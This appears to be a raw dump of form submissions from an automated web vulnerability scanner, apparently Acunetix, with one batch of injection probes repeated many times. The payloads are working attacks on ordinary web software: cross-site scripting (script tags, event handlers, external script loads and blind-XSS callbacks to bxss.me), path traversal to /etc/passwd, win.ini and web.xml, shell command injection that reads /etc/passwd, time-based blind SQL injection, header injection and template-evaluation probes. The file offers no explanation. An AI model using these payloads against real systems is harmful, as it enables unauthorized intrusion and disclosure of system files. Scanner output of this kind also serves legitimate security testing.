1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962210></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(936758)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(926714)">

response.write(9193745*9397157)

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9193745*9397157)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976226)"></g></svg>

1

1

"+response.write(9193745*9397157)+"

1

&cat /etc/passwd&

1<div style=width:expression(prompt(966837))>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

WEB-INF\web.xml

1

1<body onload=prompt(903002)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994163)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99656+100422}

1

`cat /etc/passwd`

1

1<img src=xyz OnErRor=prompt(903814)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

1&n980913=v951111

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(980849)>

'|'ld

1

1

1

)

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1<ScRiPt%20>prompt(954198)</sCripT>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

hHV169MR'

!(()&&!|*|*|

1

'

testasp.vulnweb.com

'"()

1&lt

^(#$!@#$)(()))******

pxEvwFyq')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

"

'

1

\xf6<img acu onmouseover=prompt(982533) //\xf6>

1

1

1

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

aip5Kguq'))

"

1

1

1<input autofocus onfocus=prompt(963814)>

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

-1)

1

&dir

1

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1))

1

[url=http://www.acunetix.com]website security[/url]

http://hitDNCQnTz5Vy.bxss.me/

1

1

comments

'&dir&'

h4aEQkEb'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_uE2Zq <ScRiPt >prompt(902204)</ScRiPt>

1

1

"&dir&"

1

Zzft3YEF')

1

comments

1

1

http://www.acunetix.tst

uA2okhKb'))

|dir

1'"()&%<ScRiPt >prompt(959254)</ScRiPt>

'"

comments/.

file:///etc/passwd

1

1

1

1

<!--

1

'"()&%<ScRiPt >prompt(907080)</ScRiPt>

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

"|dir

1

1_932646

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu6808\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6808

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1

1

acux1769\xc0\xbez1\xc0\xbcz2a\x90bcxuca1769

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(932482)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(924616)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(927746)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912540></ScRiPt>

1

1

response.write(9838128*9081762)

1<ScRiPt >prompt(918737)</ScRiPt>

1

1

'+response.write(9838128*9081762)+'

&cat /etc/passwd&

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(954641)">

'&cat /etc/passwd&'

"+response.write(9838128*9081762)+"

1

../../../../../../../../../../etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945128)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<div style=width:expression(prompt(959123))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

${99889+99015}

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1

cat /etc/passwd

1

1

1<body onload=prompt(988495)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916028)>

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

1&n958456=v924210

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1)

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(913808)>

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

!(()&&!|*|*|

'|'ld

1<img/src=">" onerror=alert(954391)>

1

1

lhKHqYhU'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

W2l0QLBO')

"|"ld

1<ScRiPt%20>prompt(900768)</sCripT>

1

1

1

/etc/passwd

1

'"()

'

W6UyhSMT'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1&lt

1

-1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

'

\xf6<img acu onmouseover=prompt(907208) //\xf6>

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

http://hit4jHwpUPJlC.bxss.me/

1

1

1<input autofocus onfocus=prompt(920460)>

"

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

||cat /etc/passwd

comments

1

<a href='http://www.acunetix.com'>website security</a>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

79Q25bWK'

http://www.acunetix.tst

1

&dir

[url=http://www.acunetix.com]website security[/url]

'"

1

comments

1

file:///etc/passwd

ydzhLZBB')

1'"()&%<ScRiPt >prompt(946861)</ScRiPt>

1

<!--

'&dir&'

1_9aF5d <ScRiPt >prompt(901339)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

jQVgPLOc'))

1

'"()&%<ScRiPt >prompt(981755)</ScRiPt>

1

comments/.

1

"&dir&"

1

1

1

WEB-INF/web.xml

1

1

1_978743

1

WEB-INF\web.xml

|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

'|dir

acu3975\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3975

../../../../../../../../../../boot.ini

1

1

"|dir

acux1452\xc0\xbez1\xc0\xbcz2a\x90bcxuca1452

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(932551)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(954512)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(975142)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?944128></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(942268)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(997283)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944960)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<div style=width:expression(prompt(916852))>

1

response.write(9182876*9354296)

1

WEB-INF/web.xml

1

1

1<iframe src='data:text/html

1

'+response.write(9182876*9354296)+'

1<body onload=prompt(909347)>

1

WEB-INF\web.xml

1

"+response.write(9182876*9354296)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964731)>

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

1

1

1

1

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(914004)>

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

1

1<img/src=">" onerror=alert(964492)>

1

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

1<ScRiPt%20>prompt(999856)</sCripT>

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

1&lt

1

${99973+100217}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

-1

1&n992849=v950706

\xf6<img acu onmouseover=prompt(961360) //\xf6>

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1

1<input autofocus onfocus=prompt(900903)>

1

-1)

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

"|"ld

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

[url=http://www.acunetix.com]website security[/url]

testasp.vulnweb.com

1

!(()&&!|*|*|

1

1

/etc/passwd

H62UixFr'

'

1

1

^(#$!@#$)(()))******

1_Wgsvc <ScRiPt >prompt(900602)</ScRiPt>

1

1

'

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

xfM99Qct')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

YlfQMnDv'))

1

${@print(md5(acunetix_wvs_security_test))}

"

acunetix_wvs_invalid_filename

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

http://hitfthQnt1BkH.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

comments

1

-1)

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

&dir

1

-1))

1

1

1

http://www.acunetix.tst

file:///etc/passwd

1

comments/.

1KQHy1vR'

'&dir&'

1

'"

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

wRc9u8EG')

"&dir&"

<!--

1'"()&%<ScRiPt >prompt(982268)</ScRiPt>

1

WEB-INF/web.xml

aEiZrNTP'))

1

1

|dir

'"()&%<ScRiPt >prompt(934837)</ScRiPt>

1

1

1

1

1

WEB-INF\web.xml

1

1_921145

'|dir

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu10477\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10477

1

1

acux2152\xc0\xbez1\xc0\xbcz2a\x90bcxuca2152

1

................windowswin.ini

1

1

1<ScRiPt >prompt(932391)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(995155)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(916203)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

response.write(9734509*9942832)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968349></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9734509*9942832)+'

1<ScRiPt >prompt(945816)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

1<video><source onerror="javascript:prompt(981644)">

"+response.write(9734509*9942832)+"

1

../../../../../../../../../../etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905149)"></g></svg>

'&cat /etc/passwd&'

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<div style=width:expression(prompt(905556))>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

${100124+99376}

1

1<iframe src='data:text/html

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<body onload=prompt(966884)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n976474=v931692

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910935)>

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

1

1

1

|cat /etc/passwd#

testasp.vulnweb.com

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=xyz OnErRor=prompt(908896)>

-1)

'|'ld

'"()

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<img/src=">" onerror=alert(964945)>

-1))

^(#$!@#$)(()))******

1

1

1

'

"|"ld

1

1

lvV4vgLj'

1<ScRiPt%20>prompt(907234)</sCripT>

/etc/passwd

1

1

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1&lt

oYUSMBNb')

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

sHRloubP'))

\xf6<img acu onmouseover=prompt(908346) //\xf6>

1

http://hitCJ9mmWqfSY.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1<input autofocus onfocus=prompt(917491)>

-1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

||cat /etc/passwd

1

comments

http://www.acunetix.tst

file:///etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

-1)

1

&dir

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

'"

-1))

1_f4mtI <ScRiPt >prompt(988912)</ScRiPt>

1

1

'&dir&'

1

1'"()&%<ScRiPt >prompt(925150)</ScRiPt>

WEB-INF/web.xml

1

9AryCKvB'

<!--

1

1

1

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(963425)</ScRiPt>

"&dir&"

ADrCOkxo')

1

1

1

1

1

|dir

1

JkV6XAKE'))

1_944575

../../../../../../../../../../windows/win.ini

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu4284\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4284

1

1

1

................windowswin.ini

acux6502\xc0\xbez1\xc0\xbcz2a\x90bcxuca6502

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(934728)</ScRiPt>

1

1

1<script>prompt(973196)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(993276)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983962></ScRiPt>

1

1

1<ScRiPt >prompt(936451)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(956480)">

1

1

response.write(9042535*9782911)

WEB-INF/web.xml

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991985)"></g></svg>

1

1

1

WEB-INF\web.xml

'&cat /etc/passwd&'

'+response.write(9042535*9782911)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(959358))>

"&cat /etc/passwd&"

"+response.write(9042535*9782911)+"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

1

1

1<iframe src='data:text/html

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(904551)>

1

`cat /etc/passwd`

-1)

../../../../../../../../../../etc/passwd.jpg

1

1

1

${99175+99983}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(902939)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

-1))

1

1&n962445=v956320

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(927278)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1

buCypaam'

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1<img/src=">" onerror=alert(946200)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

lnfsfwFX')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

1<ScRiPt%20>prompt(959145)</sCripT>

!(()&&!|*|*|

/etc/passwd

testasp.vulnweb.com

'"()

1

p3pVbdSi'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

^(#$!@#$)(()))******

'

1&lt

1

'

1

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

\xf6<img acu onmouseover=prompt(920290) //\xf6>

1

"

1

1

-1)

1

1<input autofocus onfocus=prompt(988442)>

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

1

80HLU9PL'

1

1

1

1

&dir

file:///etc/passwd

[url=http://www.acunetix.com]website security[/url]

M55HJSM3')

acunetix_wvs_invalid_filename

http://hitMVPPNruVF4.bxss.me/

1

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

vRXbGbG3'))

1_UzIjh <ScRiPt >prompt(957197)</ScRiPt>

comments

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

comments

1

1

"&dir&"

1

WEB-INF/web.xml

http://www.acunetix.tst

'"

1

1

1

comments/.

WEB-INF\web.xml

|dir

1'"()&%<ScRiPt >prompt(920730)</ScRiPt>

<!--

1

1

1

1

1

1

1

'|dir

'"()&%<ScRiPt >prompt(981763)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1

1_930749

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu1955\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1955

1

1

................windowswin.ini

acux8564\xc0\xbez1\xc0\xbcz2a\x90bcxuca8564

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(999331)</ScRiPt>

1

1

1

1<script>prompt(947049)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(981902)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?933435></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(939805)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(999012)">

1

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918877)"></g></svg>

1

1

1<div style=width:expression(prompt(921541))>

WEB-INF\web.xml

response.write(9487705*9046416)

1

1

1

1<iframe src='data:text/html

1

1

'+response.write(9487705*9046416)+'

&cat /etc/passwd&

1<body onload=prompt(952790)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9487705*9046416)+"

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917476)>

1

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(25.173000000000002),0)/*'XOR(if(now()=sysdate(),sleep(25.173000000000002),0))OR'"XOR(if(now()=sysdate(),sleep(25.173000000000002),0))OR"*/

1

1<img src=xyz OnErRor=prompt(996784)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

${99824+99265}

1

1<img/src=">" onerror=alert(958980)>

1

(select(0)from(select(sleep(25.173000000000002)))v)/*'+(select(0)from(select(sleep(25.173000000000002)))v)+'"+(select(0)from(select(sleep(25.173000000000002)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

1

1

-1

1

1<ScRiPt%20>prompt(922799)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

1&n968070=v963840

)

1

'|'ld

-1))

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(912440) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

Lcs0yzR6'

/etc/passwd

1<input autofocus onfocus=prompt(939591)>

'"()

^(#$!@#$)(()))******

1

4M4GjEkY')

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1

1

kC8OJ6PQ'))

[url=http://www.acunetix.com]website security[/url]

'

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1_UZe7f <ScRiPt >prompt(931851)</ScRiPt>

-1

${@print(md5(acunetix_wvs_security_test))}

"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

1

||cat /etc/passwd

-1))

1

1

1

&dir

acunetix_wvs_invalid_filename

1

vtDJnwyZ'

1

file:///etc/passwd

1

http://hitf2NN92KhbT.bxss.me/

1

'&dir&'

1

sTW3NEG2')

comments

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

"&dir&"

WEB-INF/web.xml

http://www.acunetix.tst

comments

J1vIO31A'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'"

|dir

WEB-INF\web.xml

1

1

comments/.

1

<!--

1

1

'|dir

1'"()&%<ScRiPt >prompt(980455)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

'"()&%<ScRiPt >prompt(984317)</ScRiPt>

1

1

1

1

../../../../../../../../../../boot.ini

1

1_942111

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

